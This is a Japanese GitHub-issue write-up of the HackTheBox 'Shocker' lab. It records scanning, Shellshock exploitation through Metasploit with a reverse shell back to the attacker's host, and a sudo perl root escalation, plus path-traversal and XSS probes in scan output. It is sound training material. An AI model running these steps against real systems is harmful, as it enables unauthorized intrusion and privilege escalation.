HachTheBox: Shocker (Machine Easy)

roaris commented 4 months ago

https://app.hackthebox.com/machines/Shocker

$ nmap -sC -sV -Pn 10.10.10.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-02 09:23 JST
Nmap scan report for 10.10.10.56
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.55 seconds

roaris commented 4 months ago

OpenSSH 7.2p2はユーザ名を列挙出来るらしい https://www.exploit-db.com/exploits/40136

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md を見て、metasploitで試してみる

msf6 > search openssh

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  post/windows/manage/forward_pageant                           normal  No     Forward SSH Agent Requests To Remote Pageant
   1  post/windows/manage/install_ssh                               normal  No     Install OpenSSH for Windows
   2  post/multi/gather/ssh_creds                                   normal  No     Multi Gather OpenSSH PKI Credentials Collection
   3  auxiliary/scanner/ssh/ssh_enumusers                           normal  No     SSH Username Enumeration
   4  exploit/windows/local/unquoted_service_path  2001-10-25       great   Yes    Windows Unquoted Service Path Privilege Escalation

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/local/unquoted_service_path

msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOST 10.10.10.56
RHOST => 10.10.10.56
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 2222
RPORT => 2222
msf6 auxiliary(scanner/ssh/ssh_enumusers) > echo "admin\nadministrator" > users
[*] exec: echo "admin\nadministrator" > users

msf6 auxiliary(scanner/ssh/ssh_enumusers) > cat users
[*] exec: cat users

admin
administrator
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users
user_file => users
msf6 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[*] 10.10.10.56:2222 - SSH - Using malformed packet technique
[*] 10.10.10.56:2222 - SSH - Checking for false positives
[*] 10.10.10.56:2222 - SSH - Starting scan
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

roaris commented 4 months ago

gobusterも出てこなかった

$ gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

roaris commented 4 months ago

分からないので、Guided Mode見る

How many TCP ports are listening on Shocker?

2

What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface? Hint : Run a tool like gobuster or feroxbuster to bruteforce directories on Shocker, or research the question on the internet.

gobusterしたんですけどね

roaris commented 4 months ago

末尾に/がなくて404が返ってきていたらしい -fをつけることで、末尾に/をつくので、再度実行する

$ gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 403) [Size: 294]
/icons/               (Status: 403) [Size: 292]
Progress: 40459 / 87665 (46.15%)

途中だけど、見つかるのはこれで全部かな(時間がかかりすぎる) あとserver-statusってのがあるらしいけど、/usr/share/wordlists/dirbuster/directory-list-2.3-small.txtの中にはなかった

roaris commented 4 months ago

What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface? Hint : Run a tool like gobuster or feroxbuster to bruteforce directories on Shocker, or research the question on the internet.

cgi-bin

/cgi-bin/と/icons/が見つかったけど、結局403で見れない CGIについて : https://www.tohoho-web.com/wwwcgi1.htm cgi-binの中にCGIプログラムがあるのかな cgi-binの下に直接CGIプログラムがあるのか、それともさらにディレクトリが存在しているのか gobuster cgiで調べたら、この問題のwriteupしか出てこない

roaris commented 4 months ago

What is the name of the script in the cgi-bin directory? Hint : Run a brute force tool again on /cgi-bin/, and make sure to include extensions for common scripts like .cgi, .sh, and .pl.

とりあえず、cgi-binディレクトリの下にCGIプログラムがあると仮定すれば良いのか(それともそういうもの？)

ファイル探索をするときは、-xオプションで拡張子を指定するんですね https://patchthenet.com/blog/using-gobuster-to-find-hidden-web-content/ dirオプションはそのままでOK

$ gobuster --help
Usage:
  gobuster [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  dir         Uses directory/file enumeration mode
...

ワードリストは何使ったら良いんだ https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/cgis.txt を使ってみる既に拡張子が含まれているんで、-xオプションは不要

$ gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirbuster/cgis.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/cgis.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/./                   (Status: 200) [Size: 137]
Progress: 181 / 3495 (5.18%)[ERROR] parse "http://10.10.10.56/%NETHOOD%/": invalid URL escape "%NE"
/?mod=some_thing&op=browse (Status: 200) [Size: 137]
/?mod=node&nid=some_thing&op=view (Status: 200) [Size: 137]
/./                   (Status: 200) [Size: 137]
/                     (Status: 200) [Size: 137]
/?Open                (Status: 200) [Size: 137]
/?OpenServer          (Status: 200) [Size: 137]
/                     (Status: 200) [Size: 137]
/%2e/                 (Status: 200) [Size: 137]
[ERROR] parse "http://10.10.10.56/%a%s%p%d": invalid URL escape "%a%"
/%2e/                 (Status: 200) [Size: 137]
/%2e/                 (Status: 200) [Size: 137]
Progress: 511 / 3495 (14.62%)[ERROR] parse "http://10.10.10.56/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%": invalid URL escape "%"
[ERROR] parse "http://10.10.10.56/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%": invalid URL escape "%"
/../../../../../../../../../boot.ini (Status: 400) [Size: 303]
/../../../../winnt/repair/sam._ (Status: 400) [Size: 303]
///./../.../boot.ini  (Status: 400) [Size: 303]
/DomainFiles/*//../../../../../../../../../../etc/passwd (Status: 400) [Size: 303]
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd (Status: 400) [Size: 303]
/../../../../../../../../../../etc/passwd (Status: 400) [Size: 303]
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini (Status: 400) [Size: 303]
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd (Status: 400) [Size: 303]
/?mod=<script>alert(document.cookie)</script>&op=browse (Status: 200) [Size: 137]
/?sql_debug=1         (Status: 200) [Size: 137]
//                    (Status: 200) [Size: 137]
/file/../../../../../../../../etc/ (Status: 400) [Size: 303]
/cgi-bin/             (Status: 403) [Size: 294]
/cgi-bin/             (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 299]
/?PageServices        (Status: 200) [Size: 137]
/?wp-cs-dump          (Status: 200) [Size: 137]
/../webserver.ini     (Status: 400) [Size: 303]
/./../../../../../../../../../etc/* (Status: 400) [Size: 303]
/./../../../../../../../../../etc/passw* (Status: 400) [Size: 303]
/../config.dat        (Status: 400) [Size: 303]
/cgi-bin/             (Status: 403) [Size: 294]
/cgi-bin/.htaccess    (Status: 403) [Size: 303]
/cgi-bin/.htaccess.old (Status: 403) [Size: 307]
/cgi-bin/.htaccess.save (Status: 403) [Size: 308]
/cgi-bin/.htaccess~   (Status: 403) [Size: 304]
/cgi-bin/.htpasswd    (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 295]
/.htaccess            (Status: 403) [Size: 295]
///../../data/config/microsrv.cfg (Status: 400) [Size: 303]
///////../../../../../../etc/passwd (Status: 400) [Size: 303]
/icons/               (Status: 403) [Size: 292]
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// (Status: 200) [Size: 137]
/                     (Status: 200) [Size: 137]
/?pattern=/etc/*&sort=name (Status: 200) [Size: 137]
/?N=D                 (Status: 200) [Size: 137]
/?S=A                 (Status: 200) [Size: 137]
/?D=A                 (Status: 200) [Size: 137]
/?M=A                 (Status: 200) [Size: 137]
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe (Status: 400) [Size: 303]
/cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe (Status: 400) [Size: 303]
/cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe (Status: 400) [Size: 303]
/?\"><script>alert('Vulnerable');</script> (Status: 200) [Size: 137]
Progress: 3494 / 3495 (99.97%)
===============================================================
Finished
===============================================================

なんかたくさん出てきたけど、使えそうなのが一つもない

roaris commented 4 months ago

https://qiita.com/Umbrage/items/9ae0698891583dffaf85 この記事を見て、/usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txtを使う 0.1%進むのにおよそ7秒かかるんで、終わるまで2時間近くかかるね

$ gobuster dir --url http://10.10.10.56/cgi-bin --wordlist /usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txt -x cgi,sh,pl
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              cgi,sh,pl
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html.sh             (Status: 403) [Size: 302]
/.html.cgi            (Status: 403) [Size: 303]
/.html                (Status: 403) [Size: 299]
/.html.pl             (Status: 403) [Size: 302]
/user.sh              (Status: 200) [Size: 118]
/.htm                 (Status: 403) [Size: 298]
/.htm.pl              (Status: 403) [Size: 301]
/.htm.cgi             (Status: 403) [Size: 302]
/.htm.sh              (Status: 403) [Size: 301]
/.                    (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 303]
/.htaccess.cgi        (Status: 403) [Size: 307]
/.htaccess.sh         (Status: 403) [Size: 306]
/.htaccess.pl         (Status: 403) [Size: 306]
Progress: 7957 / 252356 (3.15%)

user.shは確認したけど、大した情報じゃない

Content-Type: text/plain

Just an uptime test script

 09:33:33 up 13:16,  0 users,  load average: 0.00, 0.00, 0.00

と思ったら、user.shが

What is the name of the script in the cgi-bin directory? Hint : Run a brute force tool again on /cgi-bin/, and make sure to include extensions for common scripts like .cgi, .sh, and .pl.

の答えだったこれ重要なのか...

roaris commented 4 months ago

cgi-bin/user.sh で検索しても、この問題のwriteupしか出てこない

Optional question: The output from user.sh matches the output from what standard Linux command? Hint : Try searching for some of the words in the output, and play around in a terminal on your local system to see if you can match the output.

uptimeコマンドらしい https://eng-entrance.com/linux-command-uptime 初めて知った

roaris commented 4 months ago

What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI? Hint : This vulnerability was very famous, given the names Shellshock and Bashbug.

Apache 2.4.18はExploit DBで調べたんだけどなあ

https://www.exploit-db.com/exploits/34900 これか https://nvd.nist.gov/vuln/detail/CVE-2014-6271 https://nvd.nist.gov/vuln/detail/CVE-2014-6278

Apacheじゃなくて、Bashの脆弱性なのか

https://www.digicert.com/jp/blog/shellshock-cve-2014-6271 分からん CGIプログラムに対して、HTTPヘッダは環境変数経由で渡されるとして、HTTPヘッダに埋め込んだコマンドが実行されるのはなぜ

https://www.nca.gr.jp/info/gnu-bash-shellshock.html

Linux 系 Web サーバ上で mod_cgi あるいは、mod_cgid から起動される CGI プログラムが、 (明示的/暗示的に) GNU bash を呼び出している場合に、影響を受ける可能性があります。

確かに、user.shがCGIプログラムで、uptimeコマンドを実行しているから攻撃できそう、となるのか Bashのバージョンが分からんが

roaris commented 4 months ago

出来ない

msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   4   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   5   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   6   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   9   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   10  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   11  exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution

Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses
                                       .
   SRVPORT  8080             yes       The local port to listen on.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.23.73.202    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 172.23.73.202:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Exploit completed, but no session was created.

roaris commented 4 months ago

LHOSTを設定してなかっただけだった

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 2 opened (10.10.16.3:4444 -> 10.10.10.56:43852) at 2024-05-03 00:02:51 +0900

meterpreter > shell
Process 11761 created.
Channel 1 created.
whoami
shelly
ls
user.sh

roaris commented 4 months ago

user.shはこうなってた(プロンプト出ないから見にくい)

pwd
/usr/lib/cgi-bin
cat user.sh
#!/bin/bash
echo
echo "Content-Type: text/plain"
echo ""
echo "Just an uptime test script"
echo
uptime
echo
echo

user.txt見つけた

pwd
/home/shelly
ls
user.txt

roaris commented 4 months ago

bashのバージョンは4.2.24だっただからshellshockが成立したと

bash --version
GNU bash, version 4.2.24(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

roaris commented 4 months ago

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

/usr/bin/perlはroot権限で実行出来るってことかな

roaris commented 4 months ago

/usr/bin/perl -e "print 'Hello World';"
Hello World

sudoつけて、OSコマンドで/bin/bashを起動すれば良い

sudo /usr/bin/perl -e "system('/bin/bash');"
whoami
root
cd /root
ls
root.txt

roaris commented 4 months ago

bash -iでプロンプト出てくるらしい

bash -i
bash: no job control in this shell
root@Shocker:/root# ls
ls
root.txt

roaris commented 4 months ago

解き方まとめ

gobusterする -fをつけて末尾に/をつけないと、何も出てこない
cgi-binディレクトリに着目する
cgi-binの中にあるファイルをgobusterで探索する
user.shを見つける
cgiが使われていることと、user.shの存在からshellshockの脆弱性を利用するという発想になる
リバースシェルしてuser.txtゲット
sudo -lでroot権限で/usr/bin/perlが実行出来ることが分かり、rootに権限昇格してroot.txtゲット

roaris / ctf-log

HachTheBox: Shocker (Machine Easy) #33